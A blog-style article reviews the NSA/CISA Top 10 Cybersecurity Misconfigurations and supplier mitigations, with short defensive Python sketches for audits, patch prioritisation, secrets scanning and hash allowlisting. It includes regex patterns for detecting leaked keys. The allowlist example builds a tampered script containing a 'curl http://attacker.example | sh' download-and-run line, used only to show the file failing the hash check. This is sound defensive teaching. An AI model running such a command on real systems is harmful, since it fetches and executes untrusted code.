Top 10 Cybersecurity Misconfigurations

A look at the recent NSA/CISA Top 10 Cybersecurity Misconfigurations publication

While cybersecurity headlines are often dominated by the latest zero-day or notable vulnerability in a vendor's software/product or open-source software library, the reality is that many significant data breaches have been, and will continue to be, caused by misconfigurations.

As defined by NIST:

An incorrect or suboptimal configuration of an information system or system component that may lead to vulnerabilities.

That’s why the NSA/CISA recently released their “Top 10 Cybersecurity Misconfigurations”.

These misconfigurations were identified through extensive Red and Blue team assessments, as well as the activities of Threat Hunting and Incident Response teams.

If you’re like most cybersecurity professionals, many of these items should come as no surprise and may even seem “simple”. But as the saying goes, just because something is simple doesn’t mean it is easy, and in modern complex digital environments, doing these fundamentals at scale remains daunting.

The publication emphasizes how pervasive these misconfigurations are in large organizations, even ones with mature security postures. It also emphasizes the need for software suppliers to take a Secure-by-Design/Default approach, something CISA in particular has been advocating for and published a document on earlier this year. For those interested in Secure-by-Design/Default, I have covered it in previous articles such as “The Elusive Built-in not Bolted On” and “Cybersecurity First Principles & Shouting Into the Void”.

With that said, let’s dive into the Top 10 items they identify.

Also, as the publication points out, these are in no way prioritized or listed in order of significance, as each one on its own can be problematic and lead to a pathway of exploitation by attackers.

Default Configurations of Software and Applications

One wouldn’t think in 2023 we would be here discussing the risks of insecure default configurations of software, but here we are. Issues such as default credentials, permissions and configurations are still a common attack vector that gets exploited.

For example, default credentials in widely used commercial-off-the-shelf (COTS) software and products create a situation where malicious actors who can identify those credentials can exploit any systems and environments that haven’t changed the defaults.

These defaults are often widely known and easy to find by even the least skilled malicious actor, as they are often published by the manufacturers themselves. This can allow attackers to identify the credentials, change administrative access to something they control and pivot from compromised devices to other networked systems.

In addition to default credentials on devices, CISA points out that services can often have overly permissive access controls and vulnerable settings by default. They specifically call out things such as insecure Active Directory Certificate Services, legacy protocols/services and insecure Server Message Block (SMB) services.
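One way a defender might act on this is to audit an asset inventory for accounts still using vendor defaults. The sketch below is a minimal illustration only: the inventory format, the `DeviceAccount` type and the list of default pairs are all hypothetical and do not come from the NSA/CISA publication.

```python
from dataclasses import dataclass

# Hypothetical vendor defaults for illustration only; a real list would come
# from vendor documentation for the products actually deployed.
KNOWN_DEFAULTS = {
    ("admin", "admin"),
    ("admin", "password"),
    ("root", "root"),
}


@dataclass(frozen=True)
class DeviceAccount:
    host: str
    username: str
    password: str  # in practice, test a login rather than store cleartext


def find_default_credentials(accounts):
    """Return the accounts whose username/password pair is a known default."""
    return [
        a for a in accounts
        if (a.username.lower(), a.password) in KNOWN_DEFAULTS
    ]


inventory = [
    DeviceAccount("printer-01", "admin", "admin"),
    DeviceAccount("switch-07", "netops", "S7!longer-unique-passphrase"),
]
for account in find_default_credentials(inventory):
    print(f"{account.host}: default credentials still set for {account.username}")
```

In a real environment the check would more likely attempt an authenticated login against each device than compare stored passwords, but the idea is the same: the defaults are public, so the defender can test for them as easily as the attacker.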



If it seems like Microsoft features heavily among the items listed, that is because its products were the most common ones the assessment teams encountered during their activities. Default credentials aside, Microsoft also reigns supreme atop the CISA Known Exploited Vulnerabilities (KEV) catalog. The company is also a recent focus of the Cyber Safety Review Board (CSRB), due to Chinese hacks of Microsoft Exchange and prompts from some elected officials. Sometimes being first isn’t quite so glamorous.

CISA KEV Flag - Source: Patrick Garrity

Improper Separation of User/Administrator Privilege

Despite industry-wide buzz about things like Zero Trust, which is rooted in concepts such as least-privileged access control, this weakness still runs rampant. CISA’s publication calls out excessive account privileges, elevated service accounts and non-essential use of elevated accounts.

Anyone who has worked in IT/Cyber for some time knows that many of these issues trace back to human behavior and the general demands of working in complex environments. Accounts tend to accumulate permissions and privileges as people rotate through different roles and tasks, and these permissions rarely if ever get cleaned up.

Considering that sources such as Verizon’s Data Breach Investigations Report (DBIR) show year after year that credential compromise remains a key aspect of most data breaches, these overly permissive accounts sit lying in wait as a rich target for malicious actors to abuse.
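The privilege creep described above can be made concrete with a simple set difference: what an account holds, minus what its current role needs. This is only a sketch, and the role names and permission strings are hypothetical placeholders rather than anything from the publication.

```python
# Hypothetical role definitions: the permissions each role actually needs.
ROLE_PERMISSIONS = {
    "helpdesk": {"reset_password", "read_tickets"},
    "dba": {"read_db", "write_db", "backup_db"},
}


def excess_permissions(current_role, granted):
    """Permissions held by an account that its current role does not require."""
    required = ROLE_PERMISSIONS.get(current_role, set())
    return set(granted) - required


# An account that moved from DBA to helpdesk but kept its old access.
granted = {"reset_password", "read_tickets", "write_db", "backup_db"}
print(sorted(excess_permissions("helpdesk", granted)))
```

Anything the function returns is a candidate for removal during an access review; an unknown role is treated as needing nothing, so every permission it holds gets flagged.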

Insufficient Internal Network Monitoring

If a tree falls in a forest and no one is around to hear it does it make a sound?

Similarly, if your network is being compromised and you lack visibility, awareness and associated alerting, are you in a position to do anything about it?

No and no.

The CISA publication demonstrates that organizations need to have sufficient traffic collection and monitoring to ensure they can detect and respond to anomalous behavior.

As discussed in the publication, it isn’t uncommon for assessment and threat hunting teams to encounter systems that either lack sufficient network and host-based logging, or have logging in place that isn’t properly configured and actually monitored, leaving the organization unable to respond to potential incidents when they occur.

This allows malicious activity to go on unfettered and extends the dwell time of attackers in victims’ systems without detection. To bolster network monitoring and hardening, the publication recommends readers check out CISA’s document “CISA Red Team Shares Key Findings to Improve Monitoring and Hardening of Networks”.
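A basic first check on logging coverage is simply asking which hosts have gone quiet. The following is a rough sketch, assuming a hypothetical mapping of host names to the last time a log event was received; the host names and the 24-hour threshold are illustrative choices, not recommendations from the publication.

```python
from datetime import datetime, timedelta, timezone


def silent_hosts(expected_hosts, last_seen, now, max_silence=timedelta(hours=24)):
    """Return hosts that never logged or have been quiet longer than max_silence."""
    flagged = []
    for host in sorted(expected_hosts):
        seen = last_seen.get(host)
        if seen is None or now - seen > max_silence:
            flagged.append(host)
    return flagged


now = datetime(2023, 10, 10, 12, 0, tzinfo=timezone.utc)
last_seen = {
    "web-01": now - timedelta(minutes=5),
    "db-01": now - timedelta(days=3),
}
print(silent_hosts({"web-01", "db-01", "hr-laptop-12"}, last_seen, now))
```

A host that appears in the inventory but never in the log pipeline is exactly the kind of blind spot the assessment teams describe.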

Lack of Network Segmentation

Another fundamental security control that makes an appearance is the need to segment networks, a practice again that ties to the broader push for Zero Trust. By failing to segment networks, organizations are failing to establish security boundaries between different systems, environments and data types.

This allows malicious actors to compromise a single system and move freely across systems without encountering friction and additional security controls and boundaries that could impede their nefarious activities. The publication specifically calls out a lack of segmentation between IT and OT networks, which puts OT networks at risk and has real-world implications for security and safety in environments such as Industrial Control Systems (ICS).
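To illustrate what a segmentation boundary means in practice, here is a small sketch that classifies observed flows by zone and flags any that cross between IT and OT without an explicit allowance. The address ranges, zone names and empty allowlist are assumptions made up for this example.

```python
import ipaddress

# Hypothetical zones and address ranges, for illustration only.
ZONES = {
    "it": ipaddress.ip_network("10.10.0.0/16"),
    "ot": ipaddress.ip_network("10.20.0.0/16"),
}
# Zone pairs (source, destination) that policy explicitly permits.
ALLOWED_CROSSINGS = set()  # nothing may cross between IT and OT by default


def zone_of(address):
    """Return the name of the zone containing address, or None."""
    ip = ipaddress.ip_address(address)
    for name, network in ZONES.items():
        if ip in network:
            return name
    return None


def violates_segmentation(src, dst):
    """True when a flow crosses zones without an explicit allowance.

    Flows within one zone (or between two unzoned addresses) are out of
    scope for this check and return False.
    """
    src_zone, dst_zone = zone_of(src), zone_of(dst)
    if src_zone == dst_zone:
        return False
    return (src_zone, dst_zone) not in ALLOWED_CROSSINGS


print(violates_segmentation("10.10.4.20", "10.20.1.5"))  # IT workstation to OT device
print(violates_segmentation("10.10.4.20", "10.10.9.9"))  # stays within IT
```

Enforcement belongs in firewalls and network policy, of course; a check like this is only useful for spotting where observed traffic disagrees with the intended boundaries.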

The problem can be further exacerbated in cloud environments due to their multi-tenant nature, which can allow a malicious actor to compromise a single account/environment or service and have a cascading impact across other victims. This is a challenge we have discussed in a previous article titled “Troublesome Tenants”, where we used Wiz’s Cloud Isolation Framework to examine the issue in cloud environments.

Poor Patch Management

Patching, everyone’s favorite activity in cybersecurity, right? The Top 10 publication points out that failing to apply the latest patches can leave a system open to exploitation by malicious actors targeting known vulnerabilities.

The challenge here is that even organizations that patch regularly fall behind. Sources such as the Cyentia Institute have pointed out that organizations' remediation capacity, meaning their ability to remediate vulnerabilities (including via patching), is subpar. Organizations on average can only remediate 1 out of every 10 new vulnerabilities per month, putting them in a perpetual situation where vulnerability backlogs keep growing. That helps explain why others such as Ponemon and Rezilion found that organizations have vulnerability backlogs ranging from several hundred thousand to millions.

Source: Wade Baker/Cyentia/Kenna - LinkedIn Post
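The arithmetic behind that growing backlog is easy to sketch. The example below assumes a constant, hypothetical intake of 1,000 new vulnerabilities per month and applies the 1-in-10 remediation figure to each month's new findings only; real environments are messier, so treat the numbers as illustrative rather than as Cyentia's model.

```python
def backlog_after(months, new_per_month, remediation_rate=0.10, starting_backlog=0):
    """Open vulnerabilities after `months`, if only a fraction of each month's
    new findings is remediated and nothing older is ever closed."""
    backlog = starting_backlog
    for _ in range(months):
        remediated = round(new_per_month * remediation_rate)
        backlog += new_per_month - remediated
    return backlog


# Hypothetical intake of 1,000 new vulnerabilities per month.
for months in (1, 12, 36):
    print(months, backlog_after(months, new_per_month=1000))
```

Under these assumptions the backlog passes 10,000 within a year and 30,000 within three, which is how even a diligent team ends up staring at a six- or seven-figure number once intake is scaled to a large enterprise.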

Couple that with findings from Qualys that attackers are able to exploit vulnerabilities roughly 30% faster than organizations can remediate them, and it is a recipe for disaster - remember, attackers only need to be right once.

Source: Qualys TRURISK Threat Report 2023

Issues cited include a lack of regular patching as well as using unsupported operating systems and firmware, meaning these items simply don’t have patches available and are no longer supported by vendors. I would personally add the need for organizations to ensure they are making use of secure open source components and using the latest versions, which is also something that many organizations struggle with and is helping contribute to the increase in software supply chain attacks.

We’ve also discussed extensively in other pieces how organizations should prioritize known exploited vulnerabilities (e.g. CISA KEV) and vulnerabilities that are highly probable to be exploited (e.g. EPSS). CISA/NSA make similar recommendations in their guidance.
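As a rough illustration of that prioritization, the sketch below sorts findings so that anything on the KEV list comes first, followed by everything else in descending EPSS order. The `Finding` type and the placeholder identifiers are hypothetical; how an organization actually weights KEV against EPSS is a policy decision this example does not settle.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class Finding:
    cve_id: str   # placeholder identifiers below, not real CVEs
    in_kev: bool  # listed in the CISA KEV catalog
    epss: float   # EPSS probability of exploitation, 0.0 to 1.0


def prioritize(findings):
    """Order findings: KEV-listed first, then by descending EPSS score."""
    return sorted(findings, key=lambda f: (not f.in_kev, -f.epss))


findings = [
    Finding("CVE-A", in_kev=False, epss=0.02),
    Finding("CVE-B", in_kev=True, epss=0.40),
    Finding("CVE-C", in_kev=False, epss=0.91),
    Finding("CVE-D", in_kev=True, epss=0.97),
]
print([f.cve_id for f in prioritize(findings)])
```

With limited remediation capacity, working such a list from the top is one way to spend that capacity on the vulnerabilities most likely to matter.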

Bypass of System Access Controls

We’ve discussed the need for access controls quite a bit, but some situations allow malicious actors to bypass system access controls. The guidance specifically points out examples such as pass-the-hash (PtH) attacks, where attackers collect password hashes and use them in place of the password to authenticate, escalate privileges and access systems in an unauthorized manner.

Weak or Misconfigured MFA Methods

In this misconfiguration we again see CISA and the NSA discuss the risk of PtH-type attacks. They point out that despite the use of MFA such as smart cards and tokens on many Government/DoD networks, there is still a password hash for the account, and malicious actors can use the hash to gain unauthorized access if MFA isn’t enforced or properly configured. This problem can of course exist in commercial systems as well, which may be using YubiKeys or digital form factors and authentication tools.

Lack of Phishing Resistant MFA

Despite the industry-wide push for MFA for quite some time, we face the stark reality that not all MFA types are created equal. This misconfiguration and weakness points to the presence of MFA types that are not “phishing-resistant”, meaning they are vulnerable to attacks such as SIM swapping. The authors direct readers to resources such as CISA’s Fact Sheet “Implementing Phishing-Resistant MFA”.
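To make the distinction actionable, an identity team could flag accounts that have no phishing-resistant method enrolled at all. This sketch follows CISA's fact sheet in treating FIDO/WebAuthn and PKI-based authenticators as phishing-resistant; the method labels and the enrollment data are hypothetical names invented for the example.

```python
# Per CISA's fact sheet, FIDO/WebAuthn and PKI-based MFA are phishing-resistant.
# The method labels themselves are hypothetical names for this sketch.
PHISHING_RESISTANT = {"fido2", "piv_smart_card"}


def accounts_needing_upgrade(enrollments):
    """Return users with no phishing-resistant method enrolled."""
    return sorted(
        user for user, methods in enrollments.items()
        if not PHISHING_RESISTANT & set(methods)
    )


enrollments = {
    "alice": ["sms", "totp"],
    "bob": ["fido2", "sms"],
    "carol": [],
}
print(accounts_needing_upgrade(enrollments))
```

Note that this check is deliberately lenient: an account like `bob` passes even though SMS remains available as a fallback, which an attacker may still be able to abuse. A stricter version would flag any account with a weaker method enrolled.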

Insufficient ACLs on Network Shares and Services

It’s no secret that data is the primary thing malicious actors are after in most cases, so it isn’t a surprise to see insufficiently secured network shares and services on this list. The guidance states that attackers are using commands, OSS tooling and custom malware to identify and exploit exposed and insecure data stores.

We of course see this occur with on-premises data stores and services, and the trend has only accelerated with the adoption of cloud computing. Rampant misconfiguration of storage services by users, coupled with cheap and extensive cloud storage, lets attackers walk away with stunning amounts of data, both in terms of size and individuals impacted.

The guidance also emphasizes that attackers can not only steal data but they can use it for other nefarious purposes such as intelligence gathering for future attacks, extortion, identification of credentials to abuse and much more.
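Defenders can look for the same exposure attackers do. The sketch below walks a hypothetical export of share ACLs and reports any share where a very broad principal has access; the share paths, group names and rights are made-up illustrations, and which principals count as "too broad" is an assumption that will differ by environment.

```python
# Principals broad enough that any access they hold deserves a second look.
# The share data below is hypothetical.
BROAD_PRINCIPALS = {"Everyone", "Authenticated Users", "Domain Users"}


def overly_open_shares(share_acls):
    """Yield (share, principal, rights) where a broad principal has any access."""
    for share, acl in sorted(share_acls.items()):
        for principal, rights in sorted(acl.items()):
            if principal in BROAD_PRINCIPALS and rights:
                yield share, principal, sorted(rights)


share_acls = {
    r"\\fs01\finance": {"Finance-Team": {"read", "write"}},
    r"\\fs01\scans": {"Everyone": {"read", "write"}},
}
for finding in overly_open_shares(share_acls):
    print(finding)
```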

Poor Credential Hygiene

Credential compromise remains a primary attack vector, with sources such as Verizon’s DBIR reporting that compromised credentials are involved in over half of all attacks. The guidance specifically calls out issues such as easily crackable passwords and cleartext password disclosure, both of which can be used by attackers to compromise environments and organizations.

I would add that with the advent of cloud and the push for declarative infrastructure-as-code and machine identities and authentication, we’ve seen an even more explosive abuse of secrets, which often include credentials. This is documented well in sources such as security vendor GitGuardian’s State of Secrets Sprawl report, which we have discussed in previous articles such as “Keeping Secrets in a DevSecOps Cloud-native World”.

This problem is also why we continue to see vendors implement secrets management capabilities into their platforms and offerings. It continues to impact even the most competent digital organizations, such as Samsung, which saw over 6,000 secret keys exposed in its source code leak.
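For a feel of how secrets detection works at its simplest, here is a minimal pattern-matching sketch. It checks for two well-known shapes, an AWS access key ID prefix and a PEM private key header; the `scan_text` helper is hypothetical, and dedicated scanners go much further with many more detectors, entropy analysis and validity checks.

```python
import re

# Two illustrative patterns; dedicated scanners ship far more, plus entropy checks.
SECRET_PATTERNS = {
    "aws_access_key_id": re.compile(r"\bAKIA[0-9A-Z]{16}\b"),
    "private_key_header": re.compile(r"-----BEGIN (?:RSA |EC )?PRIVATE KEY-----"),
}


def scan_text(text):
    """Return (line_number, pattern_name) for each suspected secret."""
    hits = []
    for number, line in enumerate(text.splitlines(), start=1):
        for name, pattern in SECRET_PATTERNS.items():
            if pattern.search(line):
                hits.append((number, name))
    return hits


sample = "\n".join([
    "region = us-east-1",
    "aws_access_key_id = AKIAIOSFODNN7EXAMPLE",  # AWS's documented example key
    "debug = false",
])
print(scan_text(sample))
```

Running a check like this in pre-commit hooks or CI catches the easy cases before they reach a repository, which is far cheaper than rotating keys after a leak.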

Unrestricted Code Execution

This one is straightforward, with the recognition that attackers are looking to run arbitrary malicious payloads on systems and networks. Unverified and unauthorized programs pose significant risks as they can execute malicious code on a system or endpoint and lead to its compromise and also facilitate lateral movement or the spread of malicious software across enterprise networks. The guidance mentions that this code can take various forms too, such as executables, dynamic link libraries, HTML applications and even scripts in office applications such as macros.
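One common way to restrict what may run is an allowlist of approved file hashes. The sketch below shows only the core comparison, using SHA-256 over in-memory bytes; the script contents are invented, and real application control is enforced by the operating system or an endpoint agent rather than by a helper function like this.

```python
import hashlib


def sha256_of(data: bytes) -> str:
    """Hex-encoded SHA-256 digest of the given bytes."""
    return hashlib.sha256(data).hexdigest()


def is_allowed(data: bytes, allowlist) -> bool:
    """True only when the content's hash is on the approved list."""
    return sha256_of(data) in allowlist


# Hypothetical approved script and a tampered copy of it.
approved = b"#!/bin/sh\necho backup complete\n"
ALLOWLIST = {sha256_of(approved)}
tampered = approved + b"curl http://attacker.example | sh\n"

print(is_allowed(approved, ALLOWLIST))
print(is_allowed(tampered, ALLOWLIST))
```

Because any change to the file changes its hash, a modified or unknown binary is denied by default, which is the opposite of the "run anything unless blocked" posture this misconfiguration describes.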

Mitigations

For the sake of brevity I won’t be laying out all of the recommended mitigations in this article, but definitely recommend those interested go give the source document from the NSA/CISA a read. I will say, several of the recommendations are specific to the assessed environments (e.g. Windows specific in some cases).

The mitigations are broken out into two sections, one aimed at network defenders and the other at software manufacturers/suppliers.

I wanted to spend some time on the supplier angle, because it aligns with the language of the latest National Cybersecurity Strategy (which we have covered in another article) when it comes to pushing the onus for mitigating vulnerabilities onto those best positioned to do something about it (least-cost avoider in economic speak).

Rather than the burden of vulnerabilities falling on customers and consumers, software suppliers are arguably in many cases better positioned and equipped to address them rather than externalize that cost/risk onto the downstream customers and consumers.

The NSA/CISA publication once again points to their Secure-by-Design/Default publication titled “Shifting the Balance of Cybersecurity Risk: Principles and Approaches for Security-by-Design/Default”.

So let’s walk through some of the recommended mitigations for suppliers.

Default Configurations of Software and Applications

Here the publication points to recommendations such as embedding security controls into product architecture from the start and throughout the SDLC. It references NIST SSDF, which we have discussed here and in other articles. It also calls for security features to be provided “out of the box” and be accompanied by “loosening guides”.

This of course aligns with the recent heat some vendors, including CSPs such as Microsoft, have taken from industry and government leaders for charging for logging capabilities, leaving customers in the dark during widespread incidents unless they had the right licensing tier/subscription. The concept of loosening guides puts the onus on suppliers to produce secure products, rather than customers and consumers needing to use “hardening guidance” to make a product or system secure after purchasing it.

This of course is a delicate balance between functionality and security, and one that has been a problem since the inception of software and digital systems. Additional recommendations include eliminating default passwords that apply universally across product lines and considering the user experience consequences of security settings. This latter recommendation is particularly refreshing because it considers the user experience and the cognitive burden on users, which as we know, can lead to workarounds and behavior that violates security policies, similar to what we see with “shadow IT”.

Improper Separation of User/Administrator Privilege

This misconfiguration covers excessive account privileges for users and service accounts, as well as the routine use of elevated accounts when it isn’t actually essential.

Recommendations for suppliers include designing products so that the compromise of a single security control doesn’t compromise the entire system. This is commonly referred to as “limiting the blast radius”. Additionally, there are recommendations to generate reports automatically regarding inactive administrative accounts or services.
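The inactive-account report mentioned above could be as simple as the following sketch. The account records, field names and 90-day threshold are hypothetical choices for illustration; the publication does not prescribe a specific idle period.

```python
from datetime import date, timedelta


def inactive_admins(accounts, today, max_idle_days=90):
    """Names of admin accounts with no login in the last max_idle_days days."""
    cutoff = today - timedelta(days=max_idle_days)
    return sorted(
        name
        for name, info in accounts.items()
        if info["is_admin"]
        and (info["last_login"] is None or info["last_login"] < cutoff)
    )


accounts = {
    "svc-backup": {"is_admin": True, "last_login": date(2023, 1, 15)},
    "jsmith-adm": {"is_admin": True, "last_login": date(2023, 10, 1)},
    "old-admin": {"is_admin": True, "last_login": None},
    "intern": {"is_admin": False, "last_login": date(2022, 6, 1)},
}
print(inactive_admins(accounts, today=date(2023, 10, 10)))
```

A product that generated this list automatically, on a schedule, would remove one more manual chore that tends to get skipped in busy environments.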

Insufficient Internal Network Monitoring

Here again we see the call for software suppliers to provide high-quality audit logs to customers at no extra charge. While it is definitely debatable what qualifies as high quality, I think most would agree that customers shouldn’t be forced into scenarios where they have to cough up additional money to do things like investigate an incident or respond to a data breach.

Poor Patch Management

This misconfiguration/weakness sees mitigations in the form of embedding controls through the product architecture from the onset of development and throughout the entire SDLC, again pointing to the use of SSDF, following secure coding practices, using code reviews and testing code to identify vulnerabilities.

There is also a call to ensure published CVEs from suppliers include a root cause analysis (RCA) and the associated Common Weakness Enumeration (CWE) ID, so that the industry can perform analysis of system design flaws and seek to resolve them systemically. Following this approach can slow the pace of the cyclical “identify and patch” pain cycle we all know too well, and allow for eliminating entire classes of vulnerabilities in a system/software.
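Once advisories carry a CWE ID, spotting systemic weakness classes becomes a counting exercise. The sketch below groups a hypothetical set of advisories by CWE; the advisory IDs are placeholders, while CWE-79 (cross-site scripting) and CWE-89 (SQL injection) are real CWE entries used here only as sample values.

```python
from collections import Counter


def weakness_classes(advisories):
    """Count advisories per CWE ID, most common first."""
    return Counter(a["cwe"] for a in advisories).most_common()


# Placeholder advisory IDs; the CWE values are real weakness classes.
advisories = [
    {"id": "ADV-1", "cwe": "CWE-79"},
    {"id": "ADV-2", "cwe": "CWE-89"},
    {"id": "ADV-3", "cwe": "CWE-79"},
    {"id": "ADV-4", "cwe": "CWE-79"},
]
print(weakness_classes(advisories))
```

If one class keeps topping the list, that is the signal to fix the cause (for example, adopting a framework that escapes output by default) instead of patching each instance as it surfaces.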

As we’ve discussed above, customers/consumers only have the capability to remediate 1 out of 10 new vulnerabilities a month and vulnerability backlogs are ballooning out of control from hundreds of thousands to even millions in large complex enterprises. Until we start to resolve systemic vulnerabilities and weaknesses at their source, this isn’t likely to change and will continue to leave organizations drowning in vulnerability backlogs, cognitive overload and burnout. When the attacker only needs to be right once, sitting on a trove of hundreds of thousands to millions of vulnerabilities makes their chances of getting lucky pretty damn high.

Conclusion

While on the surface misconfigurations and weaknesses may seem intuitive to security professionals, the reality is that these issues continue to wreak havoc across the IT/Cybersecurity landscape, contributing to the majority of data breaches and security incidents. As modern IT systems only get more complex, the idea of doing the “basics” continues to get more elusive, due to complexity coupled with human factors such as cognitive overload.

That said, by striving to address the misconfigurations and weaknesses discussed in this guidance, consumers can mitigate some of the largest attack vectors in their environments that lead to compromises from malicious actors. Likewise, if software suppliers focus on addressing the issues identified in this publication, we can systemically drive down common misconfigurations and weaknesses that leave a wake of security incidents across downstream consumers and customers.
